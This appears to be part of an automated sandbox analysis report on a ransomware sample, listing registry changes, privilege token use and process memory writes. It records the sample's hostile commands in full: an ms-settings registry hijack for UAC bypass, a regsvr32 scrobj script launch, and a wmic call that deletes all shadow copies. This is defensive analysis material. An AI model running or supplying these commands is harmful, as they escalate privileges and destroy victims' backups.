N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Windows\Explorer.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\taskhostw.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\taskhostw.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\taskhostw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\taskhostw.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\DllHost.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskhostw.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2648 wrote to memory of 2880 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\notepad.exe
PID 2648 wrote to memory of 2880 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\notepad.exe
PID 2648 wrote to memory of 2512 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 2512 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 3084 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\wbem\wmic.exe
PID 2648 wrote to memory of 3084 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\wbem\wmic.exe
PID 2648 wrote to memory of 1368 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 1368 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 4736 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 4736 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 4736 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 4736 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1368 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1368 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 5052 wrote to memory of 4456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 5052 wrote to memory of 4456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 5084 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 5084 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2512 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2512 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 4512 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 4512 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4764 wrote to memory of 4016 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\wbem\wmic.exe
PID 4764 wrote to memory of 4016 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\wbem\wmic.exe
PID 4764 wrote to memory of 4016 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\wbem\wmic.exe
PID 4764 wrote to memory of 2516 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 2516 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 2516 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 1164 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 1164 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 1164 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 1552 wrote to memory of 840 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 1552 wrote to memory of 840 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 4456 wrote to memory of 1632 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 4456 wrote to memory of 1632 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
